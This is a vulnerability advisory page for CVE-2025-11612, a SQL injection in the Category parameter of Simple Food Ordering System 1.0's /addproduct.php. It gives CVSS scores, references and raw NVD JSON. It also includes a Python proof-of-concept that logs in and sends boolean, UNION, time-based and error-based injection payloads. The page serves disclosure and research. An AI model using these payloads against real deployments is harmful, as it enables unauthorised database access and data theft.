CVE-2025-11612

Description

A vulnerability has been found in code-projects Simple Food Ordering System 1.0. This impacts an unknown function of the file /addproduct.php. The manipulation of the argument Category leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:fabian:simple_food_ordering_system:1.0:*:*:*:*:*:*:* - VULNERABLE

code-projects Simple Food Ordering System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11612 SQL Injection PoC
# Target: code-projects Simple Food Ordering System 1.0
# Vulnerable file: /addproduct.php
# Vulnerable parameter: Category

import requests

# Target configuration
TARGET_URL = "http://target-site.com"
LOGIN_URL = f"{TARGET_URL}/login.php"
ADD_PRODUCT_URL = f"{TARGET_URL}/addproduct.php"

# Attacker credentials (low privilege account required)
USERNAME = "test_user"
PASSWORD = "test_password"

def exploit_sqli():
    # Step 1: Login to obtain session
    session = requests.Session()
    login_data = {
        "username": USERNAME,
        "password": PASSWORD
    }
    session.post(LOGIN_URL, data=login_data)

    # Step 2: Craft SQL injection payload for Category parameter
    # Example payloads for different SQL injection techniques:

    # Boolean-based blind SQL injection
    sqli_payload = "1' OR '1'='1"

    # UNION-based SQL injection to extract data
    # sqli_payload = "1' UNION SELECT 1,user(),database(),version(),5,6,7-- -"

    # Time-based blind SQL injection
    # sqli_payload = "1' AND SLEEP(5)-- -"

    # Error-based SQL injection
    # sqli_payload = "1' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT database()),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -"

    # Step 3: Send malicious request with injected Category parameter
    payload_data = {
        "Category": sqli_payload,
        "product_name": "Test Product",
        "price": "10.00",
        "description": "Test Description"
    }

    response = session.post(ADD_PRODUCT_URL, data=payload_data)

    # Step 4: Analyze response for SQL injection indicators
    if "error" in response.text.lower() or "sql" in response.text.lower():
        print("[+] SQL Injection vulnerability confirmed!")
        print(f"[+] Response length: {len(response.text)}")
        return True
    else:
        print("[-] No SQL injection detected")
        return False

if __name__ == "__main__":
    exploit_sqli()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11612
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11612
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11612/
[4] VulDB https://vuldb.com/cve/CVE-2025-11612
[5] https://code-projects.org/
[6] https://github.com/xmqaq/cve/issues/6
[7] https://vuldb.com/?ctiid.327942
[8] https://vuldb.com/?id.327942
[9] https://vuldb.com/?submit.672775
[10] https://github.com/xmqaq/cve/issues/6

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11612", "sourceIdentifier": "[email protected]", "published": "2025-10-11T19:15:34.090", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in code-projects Simple Food Ordering System 1.0. This impacts an unknown function of the file /addproduct.php. The manipulation of the argument Category leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:simple_food_ordering_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "A79BB63C-FF08-4190-BC96-A24DC587AD07"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/xmqaq/cve/issues/6", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327942", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327942", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.672775", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/xmqaq/cve/issues/6", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}